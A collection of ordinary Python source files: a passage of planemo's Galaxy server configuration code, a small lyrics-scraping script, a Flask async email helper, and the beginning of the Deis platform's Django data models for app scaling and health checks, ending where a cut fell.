self._kwds.get("install_resolver_dependencies", True),
self._kwds.get("install_repository_dependencies", True))
default_from_path = self._kwds.get("workflows_from_path", False)
# TODO: Allow serialization so this doesn't need to assume a
# shared filesystem with Galaxy server.
from_path = default_from_path or (runnable.type.name == "cwl_workflow")
workflow = import_workflow(
runnable.path, admin_gi=self.gi, user_gi=self.user_gi, from_path=from_path
)
self._workflow_ids[runnable.path] = workflow["id"]
def workflow_id_for_runnable(self, runnable):
if runnable.is_remote_workflow_uri:
workflow_id = remote_runnable_to_workflow_id(runnable)
else:
workflow_id = self.workflow_id(runnable.path)
return workflow_id
def workflow_id(self, path):
return self._workflow_ids[path]
@property
def use_path_paste(self):
option = self._kwds.get("paste_test_data_paths")
if option is None:
return self.default_use_path_paste
else:
return option
@property
def default_use_path_paste(self):
return False
@property
def version_major(self):
"""Return target Galaxy version."""
if self._target_version is UNINITIALIZED:
self._target_version = self.user_gi.config.get_version()["version_major"]
return self._target_version
@property
def user_api_config(self):
"""Return the API indicated configuration for user session."""
if self._target_user_config is UNINITIALIZED:
self._target_user_config = self.user_gi.config.get_config()
return self._target_user_config
class BaseManagedGalaxyConfig(BaseGalaxyConfig):
def __init__(
self,
ctx,
config_directory,
env,
test_data_dir,
port,
server_name,
master_api_key,
runnables,
kwds,
):
galaxy_url = "http://localhost:%d" % port
super(BaseManagedGalaxyConfig, self).__init__(
ctx=ctx,
galaxy_url=galaxy_url,
master_api_key=master_api_key,
user_api_key=None,
runnables=runnables,
kwds=kwds
)
self.config_directory = config_directory
self.env = env
self.test_data_dir = test_data_dir
self.port = port
self.server_name = server_name
class DockerGalaxyConfig(BaseManagedGalaxyConfig):
"""A :class:`GalaxyConfig` description of a Dockerized Galaxy instance."""
def __init__(
self,
ctx,
config_directory,
env,
test_data_dir,
port,
server_name,
master_api_key,
runnables,
docker_target_kwds,
volumes,
export_directory,
kwds,
):
super(DockerGalaxyConfig, self).__init__(
ctx,
config_directory,
env,
test_data_dir,
port,
server_name,
master_api_key,
runnables,
kwds,
)
self.docker_target_kwds = docker_target_kwds
self.volumes = volumes
self.export_directory = export_directory
def kill(self):
"""Kill planemo container..."""
kill_command = docker_util.kill_command(
self.server_name,
**self.docker_target_kwds
)
return shell(kill_command)
def startup_command(self, ctx, **kwds):
"""Return a shell command used to startup this instance.
Among other common planmo kwds, this should respect the
``daemon`` keyword.
"""
daemon = kwds.get("daemon", False)
daemon_str = "" if not daemon else " -d"
docker_run_extras = "-p %s:80%s" % (self.port, daemon_str)
env_directives = ["%s='%s'" % item for item in self.env.items()]
image = kwds.get("docker_galaxy_image", "bgruening/galaxy-stable")
run_command = docker_util.build_docker_run_command(
"", image,
interactive=False,
env_directives=env_directives,
working_directory=None,
name=self.server_name,
run_extra_arguments=docker_run_extras,
set_user=False,
volumes=self.volumes,
**self.docker_target_kwds
)
chmod_command = [
"chmod",
"-R",
"o+rwx",
self.config_directory,
]
if self.export_directory:
chmod_command.append(self.export_directory)
return shell_join(
argv_to_str(chmod_command),
run_command,
)
@property
def log_contents(self):
logs_command = docker_util.logs_command(
self.server_name,
**self.docker_target_kwds
)
output, _ = communicate(
logs_command
)
return output
def cleanup(self):
shutil.rmtree(self.config_directory, CLEANUP_IGNORE_ERRORS)
class LocalGalaxyConfig(BaseManagedGalaxyConfig):
"""A local, non-containerized implementation of :class:`GalaxyConfig`."""
def __init__(
self,
ctx,
config_directory,
env,
test_data_dir,
port,
server_name,
master_api_key,
runnables,
galaxy_root,
kwds,
):
super(LocalGalaxyConfig, self).__init__(
ctx,
config_directory,
env,
test_data_dir,
port,
server_name,
master_api_key,
runnables,
kwds,
)
self.galaxy_root = galaxy_root
def kill(self):
if self._ctx.verbose:
shell(["ps", "ax"])
exists = os.path.exists(self.pid_file)
print("Killing pid file [%s]" % self.pid_file)
print("pid_file exists? [%s]" % exists)
if exists:
print("pid_file contents are [%s]" % open(self.pid_file, "r").read())
kill_pid_file(self.pid_file)
def startup_command(self, ctx, **kwds):
"""Return a shell command used to startup this instance.
Among other common planemo kwds, this should respect the
``daemon`` keyword.
"""
daemon = kwds.get("daemon", False)
# TODO: Allow running dockerized Galaxy here instead.
setup_venv_command = setup_venv(ctx, kwds)
run_script = "%s $COMMON_STARTUP_ARGS" % shlex_quote(os.path.join(self.galaxy_root, "run.sh"))
if daemon:
run_script += " --daemon"
self.env["GALAXY_RUN_ALL"] = "1"
else:
run_script += " --server-name %s" % shlex_quote(self.server_name)
server_ini = os.path.join(self.config_directory, "galaxy.ini")
self.env["GALAXY_CONFIG_FILE"] = server_ini
if parse_version(kwds.get('galaxy_python_version') or DEFAULT_PYTHON_VERSION) >= parse_version('3'):
# We need to start under gunicorn
self.env['APP_WEBSERVER'] = 'gunicorn'
self.env['GUNICORN_CMD_ARGS'] = "--timeout={timeout} --capture-output --bind={host}:{port} --name={server_name}".format(
timeout=DEFAULT_TOOL_INSTALL_TIMEOUT,
host=kwds.get('host', '127.0.0.1'),
port=kwds['port'],
server_name=self.server_name,
)
cd_to_galaxy_command = ['cd', self.galaxy_root]
return shell_join(
cd_to_galaxy_command,
setup_venv_command,
setup_common_startup_args(),
run_script,
)
@property
def log_file(self):
"""Log file used when planemo serves this Galaxy instance."""
file_name = "%s.log" % self.server_name
return os.path.join(self.galaxy_root, file_name)
@property
def pid_file(self):
pid_file_name = "%s.pid" % self.server_name
return os.path.join(self.galaxy_root, pid_file_name)
@property
def log_contents(self):
if not os.path.exists(self.log_file):
return ""
with open(self.log_file, "r") as f:
return f.read()
def cleanup(self):
shutil.rmtree(self.config_directory, CLEANUP_IGNORE_ERRORS)
@property
def default_use_path_paste(self):
# If Planemo started a local, native Galaxy instance assume files URLs can be
# pasted.
return self.user_is_admin
def _database_connection(database_location, **kwds):
default_connection = DATABASE_LOCATION_TEMPLATE % database_location
database_connection = kwds.get("database_connection") or default_connection
return database_connection
def _find_galaxy_root(ctx, **kwds):
root_prop = "galaxy_root"
cwl = kwds.get("cwl", False)
if cwl:
root_prop = "cwl_galaxy_root"
galaxy_root = kwds.get(root_prop, None)
if galaxy_root:
return galaxy_root
else:
par_dir = os.getcwd()
while True:
run = os.path.join(par_dir, "run.sh")
config = os.path.join(par_dir, "config")
if os.path.isfile(run) and os.path.isdir(config):
return par_dir
new_par_dir = os.path.dirname(par_dir)
if new_par_dir == par_dir:
break
par_dir = new_par_dir
return None
def _find_test_data(runnables, **kwds):
test_data_search_path = "."
runnables = [r for r in runnables if r.has_tools]
if len(runnables) > 0:
test_data_search_path = runnables[0].test_data_search_path
# Find test data directory associated with path.
test_data = kwds.get("test_data", None)
if test_data:
return os.path.abspath(test_data)
else:
test_data = _search_tool_path_for(test_data_search_path, "test-data")
if test_data:
return test_data
warn(NO_TEST_DATA_MESSAGE)
return None
def _find_tool_data_table(runnables, test_data_dir, **kwds):
tool_data_search_path = "."
runnables = [r for r in runnables if r.has_tools]
if len(runnables) > 0:
tool_data_search_path = runnables[0].tool_data_search_path
tool_data_table = kwds.get("tool_data_table", None)
if tool_data_table:
return os.path.abspath(tool_data_table)
else:
extra_paths = [test_data_dir] if test_data_dir else []
return _search_tool_path_for(
tool_data_search_path,
"tool_data_table_conf.xml.test",
extra_paths,
) or _search_tool_path_for( # if all else fails just use sample
tool_data_search_path,
"tool_data_table_conf.xml.sample"
)
def _search_tool_path_for(path, target, extra_paths=None):
"""Check for presence of a target in different artifact directories."""
if extra_paths is None:
extra_paths = []
if not os.path.isdir(path):
tool_dir = os.path.dirname(path)
else:
tool_dir = path
possible_dirs = [tool_dir, "."] + extra_paths
for possible_dir in possible_dirs:
possible_path = os.path.join(possible_dir, target)
if os.path.exists(possible_path):
return os.path.abspath(possible_path)
return None
def _configure_sheds_config_file(ctx, config_directory, **kwds):
if "shed_target" not in kwds:
kwds = kwds.copy()
kwds["shed_target"] = "toolshed"
shed_target_url = tool_shed_url(ctx, **kwds)
contents = _sub(TOOL_SHEDS_CONF, {"shed_target_url": shed_target_url})
tool_sheds_conf = os.path.join(config_directory, "tool_sheds_conf.xml")
write_file(tool_sheds_conf, contents)
return tool_sheds_conf
def _tool_conf_entry_for(tool_paths):
tool_definitions = ""
for tool_path in tool_paths:
if os.path.isdir(tool_path):
tool_definitions += '''<tool_dir dir="%s" />''' % tool_path
else:
tool_definitions += '''<tool file="%s" />''' % tool_path
return tool_definitions
def _install_galaxy(ctx, galaxy_root, env, kwds):
if not kwds.get("no_cache_galaxy", False):
_install_galaxy_via_git(ctx, galaxy_root, env, kwds)
else:
_install_galaxy_via_download(ctx, galaxy_root, env, kwds)
def _install_galaxy_via_download(ctx, galaxy_root, env, kwds):
branch = _galaxy_branch(kwds)
untar_to("https://codeload.github.com/galaxyproject/galaxy/tar.gz/" + branch, tar_args=['-xvzf', '-', 'galaxy-' + branch], dest_dir=galaxy_root)
_install_with_command(ctx, galaxy_root, env, kwds)
def _install_galaxy_via_git(ctx, galaxy_root, env, kwds):
gx_repo = _ensure_galaxy_repository_available(ctx, kwds)
branch = _galaxy_branch(kwds)
command = git.command_clone(ctx, gx_repo, galaxy_root, branch=branch)
exit_code = shell(command, env=env)
if exit_code != 0:
raise Exception("Failed to glone Galaxy via git")
_install_with_command(ctx, galaxy_root, env, kwds)
def _build_eggs_cache(ctx, env, kwds):
if kwds.get("no_cache_galaxy", False):
return None
workspace = ctx.workspace
eggs_path = os.path.join(workspace, "gx_eggs")
if not os.path.exists(eggs_path):
os.makedirs(eggs_path)
env["GALAXY_EGGS_PATH"] = eggs_path
def _galaxy_branch(kwds):
branch = kwds.get("galaxy_branch", None)
if branch is None:
cwl = kwds.get("cwl", False)
branch = "cwl-1.0" if cwl else None
if branch is None:
branch = DEFAULT_GALAXY_BRANCH
return branch
def _galaxy_source(kwds):
source = kwds.get("galaxy_source", None)
if source is None:
cwl = kwds.get("cwl", False)
source = CWL_GALAXY_SOURCE if cwl else None
if source is None:
source = DEFAULT_GALAXY_SOURCE
return source
def _install_with_command(ctx, galaxy_root, env, kwds):
setup_venv_command = setup_venv(ctx, kwds)
install_cmd = shell_join(
setup_venv_command,
setup_common_startup_args(),
COMMAND_STARTUP_COMMAND,
)
exit_code = shell(install_cmd, cwd=galaxy_root, env=env)
if exit_code != 0:
raise Exception("Failed to install Galaxy via command [%s]" % install_cmd)
if not os.path.exists(galaxy_root):
raise Exception("Failed to create Galaxy directory [%s]" % galaxy_root)
if not os.path.exists(os.path.join(galaxy_root, "lib")):
raise Exception("Failed to create Galaxy directory [%s], lib missing" % galaxy_root)
def _ensure_galaxy_repository_available(ctx, kwds):
workspace = ctx.workspace
cwl = kwds.get("cwl", False)
galaxy_source = kwds.get('galaxy_source')
if galaxy_source and galaxy_source != DEFAULT_GALAXY_SOURCE:
sanitized_repo_name = "".join(c if c.isalnum() else '_' for c in kwds['galaxy_source']).rstrip()[:255]
gx_repo = os.path.join(workspace, "gx_repo_%s" % sanitized_repo_name)
else:
gx_repo = os.path.join(workspace, "gx_repo")
if cwl:
gx_repo += "_cwl"
if os.path.exists(gx_repo):
# Convert the git repository from bare to mirror, if needed
shell(['git', '--git-dir', gx_repo, 'config', 'remote.origin.fetch', '+refs/*:refs/*'])
shell(['git', '--git-dir', gx_repo, 'config', 'remote.origin.mirror', 'true'])
# Attempt remote update - but don't fail if not interweb, etc...
shell("git --git-dir %s remote update >/dev/null 2>&1" % gx_repo)
else:
remote_repo = _galaxy_source(kwds)
command = git.command_clone(ctx, remote_repo, gx_repo, mirror=True)
shell(command)
return gx_repo
def _build_env_for_galaxy(properties, template_args):
env = {}
for key, value in iteritems(properties):
if value is not None: # Do not override None with empty string
var = "GALAXY_CONFIG_OVERRIDE_%s" % key.upper()
value = _sub(value, template_args)
env[var] = value
return env
def _build_test_env(properties, env):
# Keeping these environment variables around for a little while but
# many are probably not needed as of the following commit.
# https://bitbucket.org/galaxy/galaxy-central/commits/d7dd1f9
test_property_variants = {
'GALAXY_TEST_JOB_CONFIG_FILE': 'job_config_file',
'GALAXY_TEST_MIGRATED_TOOL_CONF': 'migrated_tools_config',
'GALAXY_TEST_TOOL_CONF': 'tool_config_file',
'GALAXY_TEST_FILE_DIR': 'test_data_dir',
'GALAXY_TOOL_DEPENDENCY_DIR': 'tool_dependency_dir',
# Next line would be required for tool shed tests.
# 'GALAXY_TEST_TOOL_DEPENDENCY_DIR': 'tool_dependency_dir',
}
for test_key, gx_key in test_property_variants.items():
value = properties.get(gx_key, None)
if value is not None:
env[test_key] = value
def _handle_job_config_file(config_directory, server_name, kwds):
job_config_file = kwds.get("job_config_file", None)
if not job_config_file:
template_str = JOB_CONFIG_LOCAL
job_config_file = os.path.join(
config_directory,
"job_conf.xml",
)
docker_enable = str(kwds.get("docker", False))
docker_host = kwds.get("docker_host", docker_util.DEFAULT_HOST)
docker_host_param = ""
if docker_host:
docker_host_param = """<param id="docker_host">%s</param>""" % docker_host
conf_contents = Template(template_str).safe_substitute({
"server_name": server_name,
"docker_enable": docker_enable,
"require_container": "false",
"docker_sudo": str(kwds.get("docker_sudo", False)),
"docker_sudo_cmd": str(kwds.get("docker_sudo_cmd", docker_util.DEFAULT_SUDO_COMMAND)),
"docker_cmd": str(kwds.get("docker_cmd", docker_util.DEFAULT_DOCKER_COMMAND)),
"docker_host_param": docker_host_param,
})
write_file(job_config_file, conf_contents)
kwds["job_config_file"] = job_config_file
def _write_tool_conf(ctx, tool_paths, tool_conf_path):
tool_definition = _tool_conf_entry_for(tool_paths)
tool_conf_template_kwds = dict(tool_definition=tool_definition)
tool_conf_contents = _sub(TOOL_CONF_TEMPLATE, tool_conf_template_kwds)
write_file(tool_conf_path, tool_conf_contents)
ctx.vlog(
"Writing tool_conf to path %s with contents [%s]",
tool_conf_path,
tool_conf_contents,
)
def _handle_container_resolution(ctx, kwds, galaxy_properties):
if kwds.get("mulled_containers", False):
galaxy_properties["enable_beta_mulled_containers"] = "True"
involucro_context = build_involucro_context(ctx, **kwds)
galaxy_properties["involucro_auto_init"] = "False" # Use planemo's
galaxy_properties["involucro_path"] = involucro_context.involucro_bin
def _handle_job_metrics(config_directory, kwds):
metrics_conf = os.path.join(config_directory, "job_metrics_conf.xml")
with open(metrics_conf, "w") as fh:
fh.write(EMPTY_JOB_METRICS_TEMPLATE)
kwds["job_metrics_config_file"] = metrics_conf
def _handle_refgenie_config(config_directory, kwds):
refgenie_dir = os.path.join(config_directory, 'refgenie')
_ensure_directory(refgenie_dir)
refgenie_config = os.path.join(refgenie_dir, "genome_config.yaml")
with open(refgenie_config, "w") as fh:
fh.write(REFGENIE_CONFIG_TEMPLATE % (refgenie_dir))
kwds["refgenie_config_file"] = refgenie_config
def _handle_kwd_overrides(properties, kwds):
kwds_gx_properties = [
'job_config_file',
'job_metrics_config_file',
'dependency_resolvers_config_file',
]
for prop in kwds_gx_properties:
val = kwds.get(prop, None)
if val:
properties[prop] = val
def _sub(template, args):
if template is None:
return ''
return Template(template).safe_substitute(args)
def _ensure_directory(path):
if path is not None and not os.path.exists(path):
os.makedirs(path)
__all__ = (
"DATABASE_LOCATION_TEMPLATE",
"galaxy_config",
)
|
gather.py
|
#!/usr/bin/env python
__author__ = 'Tony Beltramelli www.tonybeltramelli.com - 09/07/2016'
import argparse
import os
import urllib2
import re
from threading import Thread
from HTMLParser import HTMLParser
DOMAIN = "songmeanings.com/"
ARTIST_PATH = 'artist/view/songs/'
def start_new_thread(task, arg):
thread = Thread(target=task, args=(arg,))
thread.start()
def write_to_file(path, data):
output_file = open(path, 'a')
output_file.write(data)
output_file.write("\n")
output_file.close()
def get_url(path, arg = ""):
return 'http://' + DOMAIN + path + arg
def get_page_content(url):
response = urllib2.urlopen(url)
return response.read()
class SongPageParser(HTMLParser):
record = False
lyrics = ""
output_path = ""
def handle_starttag(self, tag, attrs):
for attr in attrs:
if attr[0] == "class" and attr[1].find('lyric-box') != -1:
self.record = True
if attr[0] == "id" and attr[1].find('lyrics-edit') != -1:
self.record = False
write_to_file(self.output_path, self.lyrics)
self.lyrics = ""
def handle_data(self, data):
if self.record:
self.lyrics += re.sub(r'[^\x00-\x7F]+', '\'', data.lstrip()) + "\n"
class ArtistPageParser(HTMLParser):
match = 0
url = ""
title = ""
output_path = ""
def handle_starttag(self, tag, attrs):
href = None
for attr in attrs:
if attr[0] == "id" and attr[1].find('lyric-') != -1:
self.match += 1
if attr[0] == "href" and attr[1].find(DOMAIN) != -1:
self.match += 1
href = attr[1]
if self.match > 1 and href is not None:
self.url = href[href.find(DOMAIN) + len(DOMAIN):]
def handle_endtag(self, tag):
self.match = 0
def handle_data(self, data):
if self.match > 1:
self.title = data
html = get_page_content(get_url(self.url))
song_parser = SongPageParser()
song_parser.output_path = self.output_path
start_new_thread(song_parser.feed, html)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--output_file', type=str, required=True)
parser.add_argument('--artists', type=str, required=True)
args = parser.parse_args()
output_file = args.output_file
artists = args.artists.replace(' ', '').split(',')
try:
os.remove(output_file)
except OSError:
print "The output file doesn't exist, creating it"
print "Gathering lyrics..."
for i, artist in enumerate(artists):
html = get_page_content(get_url(ARTIST_PATH, artist))
artist_parser = ArtistPageParser()
artist_parser.output_path = output_file
artist_parser.feed(html)
print "Progress: {}%".format(((i + 1) * 100) / len(artists))
print "Lyrics saved in {}".format(output_file)
if __name__ == "__main__":
main()
|
email.py
|
# _*_ coding: utf-8 _*_
from threading import Thread
from flask import current_app, render_template
from flask.ext.mail import Message
from . import mail
def send_email(app, msg):
"""
在应用上下文中发送邮件。
"""
with app.app_context():
mail.send(msg)
def send_async_email(to, subject, template, **kwargs):
"""
异步地发送邮件。
"""
app = current_app._get_current_object()
msg = Message(app.config['XING_MAIL_SUBJECT_PREFIX'] + " " + \
subject, sender=app.config['XING_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template+".txt", **kwargs)
msg.html = render_template(template+".html", **kwargs)
thr = Thread(target=send_email, args=[app, msg])
thr.start()
return thr
|
models.py
|
# -*- coding: utf-8 -*-
"""
Data models for the Deis API.
"""
from __future__ import unicode_literals
import base64
from datetime import datetime
import etcd
import importlib
import logging
import re
import time
from threading import Thread
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core.exceptions import ValidationError, SuspiciousOperation
from django.db import models
from django.db.models import Count
from django.db.models import Max
from django.db.models.signals import post_delete, post_save
from django.dispatch import receiver
from django.utils.encoding import python_2_unicode_compatible
from docker.utils import utils as dockerutils
from json_field.fields import JSONField
from OpenSSL import crypto
import requests
from rest_framework.authtoken.models import Token
from api import fields, utils, exceptions
from registry import publish_release
from utils import dict_diff, fingerprint
logger = logging.getLogger(__name__)
def close_db_connections(func, *args, **kwargs):
"""
Decorator to explicitly close db connections during threaded execution
Note this is necessary to work around:
https://code.djangoproject.com/ticket/22420
"""
def _close_db_connections(*args, **kwargs):
ret = None
try:
ret = func(*args, **kwargs)
finally:
from django.db import connections
for conn in connections.all():
conn.close()
return ret
return _close_db_connections
def log_event(app, msg, level=logging.INFO):
# controller needs to know which app this log comes from
logger.log(level, "{}: {}".format(app.id, msg))
app.log(msg, level)
def validate_base64(value):
"""Check that value contains only valid base64 characters."""
try:
base64.b64decode(value.split()[1])
except Exception as e:
raise ValidationError(e)
def validate_id_is_docker_compatible(value):
"""
Check that the ID follows docker's image name constraints
"""
match = re.match(r'^[a-z0-9-]+$', value)
if not match:
raise ValidationError("App IDs can only contain [a-z0-9-].")
def validate_app_structure(value):
"""Error if the dict values aren't ints >= 0."""
try:
if any(int(v) < 0 for v in value.viewvalues()):
raise ValueError("Must be greater than or equal to zero")
except ValueError, err:
raise ValidationError(err)
def validate_reserved_names(value):
"""A value cannot use some reserved names."""
if value in settings.DEIS_RESERVED_NAMES:
raise ValidationError('{} is a reserved name.'.format(value))
def validate_comma_separated(value):
"""Error if the value doesn't look like a list of hostnames or IP addresses
separated by commas.
"""
if not re.search(r'^[a-zA-Z0-9-,\.]+$', value):
raise ValidationError(
"{} should be a comma-separated list".format(value))
def validate_domain(value):
"""Error if the domain contains unexpected characters."""
if not re.search(r'^[a-zA-Z0-9-\.]+$', value):
raise ValidationError('"{}" contains unexpected characters'.format(value))
def validate_certificate(value):
try:
crypto.load_certificate(crypto.FILETYPE_PEM, value)
except crypto.Error as e:
raise ValidationError('Could not load certificate: {}'.format(e))
def validate_common_name(value):
if '*' in value:
raise ValidationError('Wildcard certificates are not supported')
def get_etcd_client():
if not hasattr(get_etcd_client, "client"):
# wire up etcd publishing if we can connect
try:
get_etcd_client.client = etcd.Client(
host=settings.ETCD_HOST,
port=int(settings.ETCD_PORT))
get_etcd_client.client.get('/deis')
except etcd.EtcdException:
logger.log(logging.WARNING, 'Cannot synchronize with etcd cluster')
get_etcd_client.client = None
return get_etcd_client.client
class AuditedModel(models.Model):
"""Add created and updated fields to a model."""
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
class Meta:
"""Mark :class:`AuditedModel` as abstract."""
abstract = True
def select_app_name():
"""Select a unique randomly generated app name"""
name = utils.generate_app_name()
while App.objects.filter(id=name).exists():
name = utils.generate_app_name()
return name
class UuidAuditedModel(AuditedModel):
"""Add a UUID primary key to an :class:`AuditedModel`."""
uuid = fields.UuidField('UUID', primary_key=True)
class Meta:
"""Mark :class:`UuidAuditedModel` as abstract."""
abstract = True
@python_2_unicode_compatible
class App(UuidAuditedModel):
"""
Application used to service requests on behalf of end-users
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
id = models.SlugField(max_length=64, unique=True, default=select_app_name,
validators=[validate_id_is_docker_compatible,
validate_reserved_names])
structure = JSONField(default={}, blank=True, validators=[validate_app_structure])
class Meta:
permissions = (('use_app', 'Can use app'),)
@property
def _scheduler(self):
mod = importlib.import_module(settings.SCHEDULER_MODULE)
return mod.SchedulerClient(settings.SCHEDULER_TARGET,
settings.SCHEDULER_AUTH,
settings.SCHEDULER_OPTIONS,
settings.SSH_PRIVATE_KEY)
def __str__(self):
return self.id
@property
def url(self):
return self.id + '.' + settings.DEIS_DOMAIN
def _get_job_id(self, container_type):
app = self.id
release = self.release_set.latest()
version = "v{}".format(release.version)
job_id = "{app}_{version}.{container_type}".format(**locals())
return job_id
def _get_command(self, container_type):
try:
# if this is not procfile-based app, ensure they cannot break out
# and run arbitrary commands on the host
# FIXME: remove slugrunner's hardcoded entrypoint
release = self.release_set.latest()
if release.build.dockerfile or not release.build.sha:
return "bash -c '{}'".format(release.build.procfile[container_type])
else:
return 'start {}'.format(container_type)
# if the key is not present or if a parent attribute is None
except (KeyError, TypeError, AttributeError):
# handle special case for Dockerfile deployments
return '' if container_type == 'cmd' else 'start {}'.format(container_type)
def log(self, message, level=logging.INFO):
"""Logs a message in the context of this application.
This prefixes log messages with an application "tag" that the customized deis-logspout will
be on the lookout for. When it's seen, the message-- usually an application event of some
sort like releasing or scaling, will be considered as "belonging" to the application
instead of the controller and will be handled accordingly.
"""
logger.log(level, "[{}]: {}".format(self.id, message))
def create(self, *args, **kwargs):
"""Create a new application with an initial config and release"""
config = Config.objects.create(owner=self.owner, app=self)
Release.objects.create(version=1, owner=self.owner, app=self, config=config, build=None)
def delete(self, *args, **kwargs):
"""Delete this application including all containers"""
try:
# attempt to remove containers from the scheduler
self._destroy_containers([c for c in self.container_set.exclude(type='run')])
except RuntimeError:
pass
self._clean_app_logs()
return super(App, self).delete(*args, **kwargs)
def restart(self, **kwargs):
to_restart = self.container_set.all()
if kwargs.get('type'):
to_restart = to_restart.filter(type=kwargs.get('type'))
if kwargs.get('num'):
to_restart = to_restart.filter(num=kwargs.get('num'))
self._restart_containers(to_restart)
return to_restart
def _clean_app_logs(self):
"""Delete application logs stored by the logger component"""
try:
url = 'http://{}:{}/{}/'.format(settings.LOGGER_HOST, settings.LOGGER_PORT, self.id)
requests.delete(url)
except Exception as e:
# Ignore errors deleting application logs. An error here should not interfere with
# the overall success of deleting an application, but we should log it.
err = 'Error deleting existing application logs: {}'.format(e)
log_event(self, err, logging.WARNING)
def scale(self, user, structure): # noqa
"""Scale containers up or down to match requested structure."""
if self.release_set.latest().build is None:
raise EnvironmentError('No build associated with this release')
requested_structure = structure.copy()
release = self.release_set.latest()
# test for available process types
available_process_types = release.build.procfile or {}
for container_type in requested_structure:
if container_type == 'cmd':
continue # allow docker cmd types in case we don't have the image source
if container_type not in available_process_types:
raise EnvironmentError(
'Container type {} does not exist in application'.format(container_type))
msg = '{} scaled containers '.format(user.username) + ' '.join(
"{}={}".format(k, v) for k, v in requested_structure.items())
log_event(self, msg)
# iterate and scale by container type (web, worker, etc)
changed = False
to_add, to_remove = [], []
scale_types = {}
# iterate on a copy of the container_type keys
for container_type in requested_structure.keys():
containers = list(self.container_set.filter(type=container_type).order_by('created'))
# increment new container nums off the most recent container
results = self.container_set.filter(type=container_type).aggregate(Max('num'))
container_num = (results.get('num__max') or 0) + 1
requested = requested_structure.pop(container_type)
diff = requested - len(containers)
if diff == 0:
continue
changed = True
scale_types[container_type] = requested
while diff < 0:
c = containers.pop()
to_remove.append(c)
diff += 1
while diff > 0:
# create a database record
c = Container.objects.create(owner=self.owner,
app=self,
release=release,
type=container_type,
num=container_num)
to_add.append(c)
container_num += 1
diff -= 1
if changed:
if "scale" in dir(self._scheduler):
self._scale_containers(scale_types, to_remove)
else:
if to_add:
self._start_containers(to_add)
if to_remove:
self._destroy_containers(to_remove)
# save new structure to the database
vals = self.container_set.exclude(type='run').values(
'type').annotate(Count('pk')).order_by()
new_structure = structure.copy()
new_structure.update({v['type']: v['pk__count'] for v in vals})
self.structure = new_structure
self.save()
return changed
def _scale_containers(self, scale_types, to_remove):
release = self.release_set.latest()
for scale_type in scale_types:
image = release.image
version = "v{}".format(release.version)
kwargs = {'memory': release.config.memory,
'cpu': release.config.cpu,
'tags': release.config.tags,
'version': version,
'aname': self.id,
'num': scale_types[scale_type]}
job_id = self._get_job_id(scale_type)
command = self._get_command(scale_type)
try:
self._scheduler.scale(
name=job_id,
image=image,
command=command,
**kwargs)
except Exception as e:
err = '{} (scale): {}'.format(job_id, e)
log_event(self, err, logging.ERROR)
raise
[c.delete() for c in to_remove]
def _start_containers(self, to_add):
"""Creates and starts containers via the scheduler"""
if not to_add:
return
create_threads = [Thread(target=c.create) for c in to_add]
start_threads = [Thread(target=c.start) for c in to_add]
[t.start() for t in create_threads]
[t.join() for t in create_threads]
if any(c.state != 'created' for c in to_add):
err = 'aborting, failed to create some containers'
log_event(self, err, logging.ERROR)
self._destroy_containers(to_add)
raise RuntimeError(err)
[t.start() for t in start_threads]
[t.join() for t in start_threads]
if set([c.state for c in to_add]) != set(['up']):
err = 'warning, some containers failed to start'
log_event(self, err, logging.WARNING)
# if the user specified a health check, try checking to see if it's running
try:
config = self.config_set.latest()
if 'HEALTHCHECK_URL' in config.values.keys():
self._healthcheck(to_add, config.values)
except Config.DoesNotExist:
pass
def _healthcheck(self, containers, config):
# if at first it fails, back off and try again at 10%, 50% and 100% of INITIAL_DELAY
intervals = [1.0, 0.1, 0.5, 1.0]
# HACK (bacongobbler): we need to wait until publisher has a chance to publish each
# service to etcd, which can take up to 20 seconds.
time.sleep(20)
for i in xrange(len(intervals)):
delay = int(config.get('HEALTHCHECK_INITIAL_DELAY', 0))
try:
# sleep until the initial timeout is over
if delay > 0:
time.sleep(delay * intervals[i])
to_healthcheck = [c for c in containers if c.type in ['web', 'cmd']]
self._do_healthcheck(to_healthcheck, config)
break
except exceptions.HealthcheckException as e:
try:
next_delay = delay * intervals[i+1]
msg = "{}; trying again in {} seconds".format(e, next_delay)
log_event(self, msg, logging.WARNING)
except IndexError:
log_event(self, e, logging.WARNING)
else:
self._destroy_containers(containers)
msg = "aborting, app containers failed to respond to health check"
log_event(self, msg, logging.ERROR)
raise RuntimeError(msg)
def _do_healthcheck(self, containers, config):
path = config.get('HEALTHCHECK_URL', '/')
timeout = int(config.get('HEALTHCHECK_TIMEOUT', 1))
if not _etcd_client:
raise exceptions.HealthcheckException('no etcd client available')
for container in containers:
try:
key = "/deis/services/{self}/{container.job_id}".format(**locals())
url = "http://{}{}".format(_etcd_client.get(key).value, path)
response = requests.get(url, timeout=timeout)
if response.status_code != requests.codes.OK:
raise exceptions.HealthcheckException(
"app failed health check (got '{}', expected: '200')".format(
response.status_code))
except (requests.Timeout, requests.ConnectionError, KeyError) as e:
raise exceptions.HealthcheckException(
'failed to connect to container ({})'.format(e))
def _restart_containers(self, to_restart):
"""Restarts containers via the scheduler"""
if not to_restart:
return
stop_threads = [Thread(target=c.stop) for c in to_restart]
start_threads = [Thread(target=c.start) for c in to_restart]
[t.start() for t in stop_threads]
[t.join() for t in stop_threads]
if any(c.state != 'created' for c in to_restart):
err = 'warning, some containers failed to stop'
log_event(self, err, logging.WARNING)
[t.start() for t in start_threads]
[t.join() for t in start_threads]
if any(c.state != 'up' for c in to_restart):
err = 'warning, some containers failed to start'
log_event(self, err, logging.WARNING)
def _destroy_containers(self, to_destroy):
"""Destroys containers via the scheduler"""
if not to_destroy:
return
destroy_threads = [Thread(target=c.destroy) for c in to_destroy]
[t.start() for t in destroy_threads]
[t.join() for t in destroy_threads]
[c.delete() for c in to_destroy if c.state == 'destroyed']
if any(c.state != 'destroyed' for c in to_destroy):
err = 'aborting, failed to destroy some containers'
log_event(self, err, logging.ERROR)
raise RuntimeError(err)
def deploy(self, user, release):
"""Deploy a new release to this application"""
existing = self.container_set.exclude(type='run')
new = []
scale_types = set()
for e in existing:
n = e.clone(release)
n.save()
new.append(n)
scale_types.add(e.type)
if new and "deploy" in dir(self._scheduler):
self._deploy_app(scale_types, release, existing)
else:
self._start_containers(new)
# destroy old containers
if existing:
self._destroy_containers(existing)
# perform default scaling if necessary
if self.structure == {} and release.build is not None:
self._default_scale(user, release)
def _deploy_app(self, scale_types, release, existing):
